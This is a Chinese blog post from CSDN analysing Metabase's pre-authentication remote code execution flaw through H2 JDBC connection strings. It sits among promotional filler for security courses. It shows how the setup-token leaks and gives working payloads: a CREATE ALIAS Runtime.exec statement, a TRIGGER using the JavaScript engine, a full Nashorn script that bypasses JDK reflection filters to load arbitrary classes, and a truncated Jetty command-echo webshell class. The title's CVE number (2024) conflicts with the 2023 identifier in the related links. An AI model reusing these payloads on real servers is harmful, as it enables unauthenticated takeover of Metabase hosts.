漏洞分析|Metabase 代码执行漏洞(CVE-2024-38646):H2 JDBC 深入利用

最新推荐文章于 2024-05-17 15:33:52 发布
最新推荐文章于 2024-05-17 15:33:52 发布
阅读量368 收藏 4
点赞数 4
分类专栏: 程序员 文章标签: 网络安全 学习 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84297899/article/details/138852808
版权

一、网安学习成长路线图

网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
在这里插入图片描述

二、网安视频合集

观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
在这里插入图片描述

三、精品网安学习书籍

当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
在这里插入图片描述

四、网络安全源码合集+工具包

光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。
在这里插入图片描述

五、网络安全面试题

最后就是大家最关心的网络安全面试题板块
在这里插入图片描述在这里插入图片描述

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

从函数调用的逻辑来看,/api/setup/validate 会通过 api.database/test-database-connection 来处理输入的参数完成对数据库的校验。但本身 api.database/test-database-connection 其实就是 POST /api/database 路由的核心处理参数。

pCz4AEt.png

从整体的逻辑来看,该漏洞可通过 setupdatabase 两种方式来完成对漏洞验证,不同的是 setup 方式在安装时是不需要权限的,database 需要管理员权限。

setup 在安装时会校验 setup-token 参数是否正确,来判断是否要进行下步的数据库连接。

pCz4iDA.png

setup-token 在进行生成的时候被默认设置为了 public 权限,所以可以通过 /api/session/properties 来读取。

pCz4FHI.pngpCz49jH.png

0x04 深入利用

在漏洞分析章节中说明,我们可以通过 setup + setup-token 来完整的漏洞利用。在利用时主要依靠于数据库的类型,目前 Metabase 支持多种数据库,本次我们重点说明 H2 数据库的深入利用,目前最为常用利用方式是 RUNSCRIPTTRIGGER 来完成对漏洞的利用。

H2 数据库在数据库时拥有函数 init 参数,该参数可以执行任意一条 SQL 语句,所以在整体围绕利用中主要通过一条 SQL 语句变换成完美的漏洞利用链条。

pCz4uvQ.png

4.1 RUNSCRIPT

RUNSCRIPT FROM 可以使用 HTTP 协议执行远程的 SQL 语句,那么在利用的时候我们即可构造恶意的 SQL 语句来完成对漏洞利用。

在执行 SQL 语句时 CREATE ALIAS 来会将内容值进行 javac 编译之后然后进行运行。

pCz4m8S.png

DROP ALIAS IF EXISTS sehll;CREATE ALIAS sehll AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "hello";}';CALL sehll ('touch /tmp/123')

pCz4EUP.png

需要注意的是默认官方发布的 Docker 镜像中没用 javc 命令,所以 CREATE ALIAS 无法能够正常使用。

pCz4V4f.png

但是该方式需要依赖 HTTP 服务,通常禁止向外部网络建立HTTP协议请求,所以这种方式在真实的攻击中发挥的作用就会小很多。

4.2 TRIGGER

H2 在解析 init 参数时对 CREATE TRIGGER 会由 loadFromSource 做特殊处理,根据执行内容的开头来判断是否为需要通过 javascript 引擎执行。如果以 //javascript 开头就会通过 javascript 引擎进行编译然后进行执行。

pCz4eC8.png

我们就可以通过 javascript 引擎来实现代码执行,不过该方式在 JDK 15 之后移除了默认的解析,但是有意思的是 Metabase 在项目中使用到了 js 引擎技术。

pCz4ngg.png

最后我们即可构建 javascript 引擎来构建代码执行,如:

java.lang.Runtime.getRuntime().exec('touch /tmp/999')

pCz4Muj.png

4.3 Define Class

通过 TIGGER 我们可以进行执行 javascript 引擎的任意代码执行,所以为了能够更加入的利用非常有必要进行自定义 Class 加载以及执行。由于最新版的 Metabase 对 JDK 运行产生了限制必须要求为 JDK >= 11,所以就必须要解决 JDK9 modules、JDK 11 ReflectionFilter 的问题。

针对类似问题,我们对 javascript 脚本进行了高度的兼容以及高版本 JDK 的 Bypass 操作,核心代码如下:

try {
  load("nashorn:mozilla\_compat.js");
} catch (e) {}
function getUnsafe(){
  var theUnsafeMethod = java.lang.Class.forName("sun.misc.Unsafe").getDeclaredField("theUnsafe");
  theUnsafeMethod.setAccessible(true); 
  return theUnsafeMethod.get(null);
}
function removeClassCache(clazz){
  var unsafe = getUnsafe();
  var clazzAnonymousClass = unsafe.defineAnonymousClass(clazz,java.lang.Class.forName("java.lang.Class").getResourceAsStream("Class.class").readAllBytes(),null);
  var reflectionDataField = clazzAnonymousClass.getDeclaredField("reflectionData");
  unsafe.putObject(clazz,unsafe.objectFieldOffset(reflectionDataField),null);
}
function bypassReflectionFilter() {
  var reflectionClass;
  try {
    reflectionClass = java.lang.Class.forName("jdk.internal.reflect.Reflection");
  } catch (error) {
    reflectionClass = java.lang.Class.forName("sun.reflect.Reflection");
  }
  var unsafe = getUnsafe();
  var classBuffer = reflectionClass.getResourceAsStream("Reflection.class").readAllBytes();
  var reflectionAnonymousClass = unsafe.defineAnonymousClass(reflectionClass, classBuffer, null);
  var fieldFilterMapField = reflectionAnonymousClass.getDeclaredField("fieldFilterMap");
  var methodFilterMapField = reflectionAnonymousClass.getDeclaredField("methodFilterMap");
  if (fieldFilterMapField.getType().isAssignableFrom(java.lang.Class.forName("java.util.HashMap"))) {
    unsafe.putObject(reflectionClass, unsafe.staticFieldOffset(fieldFilterMapField), java.lang.Class.forName("java.util.HashMap").getConstructor().newInstance());
  }
  if (methodFilterMapField.getType().isAssignableFrom(java.lang.Class.forName("java.util.HashMap"))) {
    unsafe.putObject(reflectionClass, unsafe.staticFieldOffset(methodFilterMapField), java.lang.Class.forName("java.util.HashMap").getConstructor().newInstance());
  }
  removeClassCache(java.lang.Class.forName("java.lang.Class"));
}
function setAccessible(accessibleObject){
    var unsafe = getUnsafe();
    var overrideField = java.lang.Class.forName("java.lang.reflect.AccessibleObject").getDeclaredField("override");
    var offset = unsafe.objectFieldOffset(overrideField);
    unsafe.putBoolean(accessibleObject, offset, true);
}
function defineClass(){
  var clz = null;
  var version = java.lang.System.getProperty("java.version");
  var unsafe = getUnsafe();
  var classLoader = new java.net.URLClassLoader(java.lang.reflect.Array.newInstance(java.lang.Class.forName("java.net.URL"), 0));
  try{
    if (version.split(".")[0] >= 11) {
      bypassReflectionFilter();
    defineClassMethod = java.lang.Class.forName("java.lang.ClassLoader").getDeclaredMethod("defineClass", java.lang.Class.forName("[B"),java.lang.Integer.TYPE, java.lang.Integer.TYPE);
    setAccessible(defineClassMethod);
    // 绕过 setAccessible 
    clz = defineClassMethod.invoke(classLoader, bytes, 0, bytes.length);
    }else{
      var protectionDomain = new java.security.ProtectionDomain(new java.security.CodeSource(null, java.lang.reflect.Array.newInstance(java.lang.Class.forName("java.security.cert.Certificate"), 0)), null, classLoader, []);
      clz = unsafe.defineClass(null, bytes, 0, bytes.length, classLoader, protectionDomain);
    }
  }catch(error){
    error.printStackTrace();
  }finally{
    return clz;
  }
}
defineClass();
4.4 漏洞回显

在漏洞回显时,我们就可以借助 DefineClass 来执行完成对漏洞的回显利用,但是目前最新版本的 Metabase 使用 Jetty11,所以需要针对该版本做回显适配,核心代码如下:

import java.io.OutputStream;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.Scanner;

/\*\*
 \* Jetty CMD 回显马
 \* @author R4v3zn woo0nise@gmail.com
 \* @version 1.0.1
 \*/
public class JE2 {

    public JE2(){
        try{
            invoke();
        }catch (Exception e){
            e.printStackTrace();
        }
    }

    public void invoke()throws Exception{
        ThreadGroup group = Thread.currentThread().getThreadGroup();
        java.lang.reflect.Field f = group.getClass().getDeclaredField("threads");
        f.setAccessible(true);
        Thread[] threads = (Thread[]) f.get(group);
        thread : for (Thread thread: threads) {
            try{
                Field threadLocalsField = thread.getClass().getDeclaredField("threadLocals");
                threadLocalsField.setAccessible(true);
                Object threadLocals = threadLocalsField.get(thread);
                if (threadLocals == null){
                    continue;
                }
                Field tableField = threadLocals.getClass().getDeclaredField("table");
                tableField.setAccessible(true);
                Object tableValue = tableField.get(threadLocals);
                if (tableValue == null){
                    continue;
                }
                Object[] tables =  (Object[])tableValue;
                for (Object table:tables) {
                    if (table == null){
                        continue;
                    }
                    Field valueField = table.getClass().getDeclaredField("value");
                    valueField.setAccessible(true);
                    Object value = valueField.get(table);
                    if (value == null){
                        continue;
                    }
                    System.out.println(value.getClass().getName());
                    if(value.getClass().getName().endsWith("AsyncHttpConnection")){
                        Method method = value.getClass().getMethod("getRequest", null);
                        value = method.invoke(value, null);
                        method = value.getClass().getMethod("getHeader", new Class[]{String.class});
                        String cmd = (String)method.invoke(value, new Object[]{"cmd"});
                        String result = "\n"+exec(cmd);
                        method = value.getClass().getMethod("getPrintWriter", new Class[]{String.class});
                        java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(value, new Object[]{"utf-8"});


## 学习路线:

这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/7a04c5d629f1415a9e35662316578e07.png#pic_center)





**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)**

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
2401_84297899
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Metabase 远程代码执行(CVE-2023-38646)
失心少年
07-30 515
Metabase是一款开源数据分析及可视化工具。它可允许用户连接至各种不同类型数据源,未经身份认证的攻击者可利用漏洞在服务器上以运行 Metabase服务器的权限进行任意命令执行
漏洞分析Metabase 代码执行漏洞CVE-2023-38646):H2 JDBC 深入利用
m0_46699477的博客
07-28 1861
利用 TRIGGER + DefineClass 完整的实现了 JAVA 代码执行漏洞回显。
漏洞复现】Metabase 远程命令执行漏洞(CVE-2023-38646)
做自己喜欢的事,并将其发挥到极致!
08-03 4524
Metabase是美国Metabase公司的一个开源数据分析平台。Metabase是一个开源的数据分析和可视化工具,它可以帮助用户轻松地连接到各种数据源,包括数据库、云服务和API,然后使用直观的界面进行数据查询、分析和可视化。Metabase 0.46.6.1之前版本和Metabase Enterprise 1.46.6.1之前版本存在安全漏洞,该漏洞源于允许攻击者以服务器的权限级别在服务器上执行任意命令。
Metabase 安装和使用教程
最新发布
云原生实验室
05-17 1743
本文全面介绍了开源数据分析平台 Metabase,从功能特性到应用场景,从安装部署到使用操作,深入探讨了 Metabase 在企业数据分析中的方方面面。Metabase 凭借其灵活的部署方式、强大的数据连接能力、直观的可视化查询界面、精美的仪表盘展示以及细粒度的权限管控等特性,可以帮助企业快速搭建起一套自助式的数据分析平台。无论是管理层、业务人员、运营专家还是数据分析师,都能在 Metabase 中找到适合自己的数据分析方式。
2024网络安全山东省赛-SMB信息收集解析(中职组)_使用访问工具对服务器服务访问,将服务器中管理员桌面的文本文档里的内容作为 flag
2401_84252281的博客
04-26 731
任务环境说明:服务器场景:Server1。
开源BI分析工具 Metabase 中存在远程代码执行漏洞,未完全修复
smellycat000的专栏
07-28 338
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士在商业情报 (BI) 领域,开源工具 Metabase 以无缝的数据解释能力占据一席之地。该自助服务BI工具已用于全球各地的组织机构中,赋能用户提出数据问题并获得可视化的、易于理解的答案。Metabase 的设计对用户友好,无需了解SQL或其它编程语言的知识,扩宽了组织机构中的可用性。Metabase 与多种数据来源相连,如关系数据库、云存储和平...
metabase-google-sheets-add-on:将配置数据库问题直接导入到Google表格中
04-29
importQuestion :使用其问题ID号(您可以在问题URL的末尾找到)从Metabase导入单个问题到当前的Google表格标签中 importAllQuestions :使用以下名称约定导入Google表格中的所有问题: (metabase/123) ->导入问题...
Python库 | metabase_api-0.2.6-py3-none-any.whl
03-22
总之,`metabase_api`库为Python开发者提供了一种高效的方式来利用Metabase的强大功能,无论是数据探索、报表构建还是与其他系统的集成,都极大地提升了数据分析的效率。通过深入理解和熟练使用这个库,开发人员能够...
metabase-compose:使用compose运行Metabase的dockerized解决方案
02-05
"metabase-compose"提供了一种简便的方式,利用Docker Compose在本地或生产环境中快速部署和管理Metabase实例。结合MySQL或PostgreSQL,Metabase能够处理各种类型的数据,并通过直观的界面提供强大的BI和数据分析...
metabase-athena-driver:适用于Metabase 0.32及更高版本的Amazon Athena驱动程序
01-30
Metabase与Amazon Athena驱动程序】 Metabase是一款开源的...综上所述,`metabase-athena-driver`让Metabase用户能够充分利用AWS Athena的强大查询能力,同时保持Metabase的易用性,是大数据分析和查询的理想组合。
metabase-clickhouse-driver:用于Metabase商业智能前端的ClickHouse数据库驱动程序
05-03
元数据库-clickhouse-驱动程序( )商业智能前端的 ( )数据库驱动程序安装下载Metabase Jar and Run 从“下载最新的元数据库二进制发行版(jar文件)。 从该存储库的“发布”页面下载ClickHouse驱动程序jar 创建一...
Metabase任意文件读取漏洞CVE-2021-41277)
一枚不知名的Java程序猿
10-03 1622
CVE-2021-41277漏洞复现
CVE-2023-38646Metabase远程命令执行漏洞
MachinegunJoe777的博客
09-05 122
Metabase是一个开源的数据分析和可视化工具,它可以帮助用户轻松地连接到各种数据源,包括数据库、云服务和API,然后使用直观的界面进行数据查询、分析和可视化。漏洞编号:CVE-2023-38646Metabase open source 0.46.6.1之前的版本和Metabase Enterprise 1.46.6.1之前的版本存在一个漏洞,允许攻击者在服务器的权限级别上执行任意命令,利用时不需要身份验证。
Metabase 信息泄露漏洞CVE-2021-41277)——漏洞复现
W小哥
11-24 2969
一、漏洞简介 metabase 是一个简单、开源的数据分析平台。 CVE-2021-41277 在受影响的版本中,自定义 GeoJSON 地图(admin->settings->maps->custom maps->add a map)操作缺少权限验证,攻击者可通过该漏洞获得敏感信息。 该漏洞CVSS评分:9.9,危害等级:严重 二、影响版本 影响版本: metabase version < 0.40.5 metabase version >= 1.0.0, < 1
漏洞复现-metabase-文件包含】vulfocus/metabase-cve_2021_41277
10-15 687
metabase-文件包含】
H2database-未授权访问漏洞复现
weixin_45366453的博客
06-29 2629
H2 database是一款Java内存数据库,多用于单元测试。默认端口:20051H2 database自带一个Web管理页面,在Spirng开发中,如果我们设置如下选项,即可允许外部用户访问Web管理页面,且没有鉴权: 利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令。执行如下命令启动一个Springboot + h2database环境:启动后,访问即可查看到H2 database的管理页面。下载JNDI-Injection-Exploithttps://github.co
vulhub-Couchdb+H2database漏洞复现(简单好上手)
qq_68064663的博客
11-15 253
vulhub-Couchdb+H2database漏洞复现(简单好上手)
服务攻防-数据库安全-Influxdb&H2database&CouchDB&ElasticSearch数据库漏洞复现
ran的博客
05-07 2383
默认端口:InfluxDB 是一个开源的时间序列数据库,旨在处理大规模数据处理和分析的高写入和查询负载。它针对实时存储和查询大量时间戳数据进行了优化。InfluxDB 提供了一种类似 SQL 的查询语言称为 InfluxQL,允许用户从数据库中检索和操作数据。它还支持各种客户端库和插件,以与其他数据源和工具集成。InfluxDB 的一些主要特点包括:高写入和查询性能:InfluxDB 优化了高吞吐量数据摄取和检索,非常适合实时数据处理和分析
CVE-2023-21839远程代码执行漏洞
刘家华(游戏开发)
05-01 1544
weblogic CVE-2023-21839、CVE-2023-21931、CVE-2023-21979远程代码执行漏洞复现。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值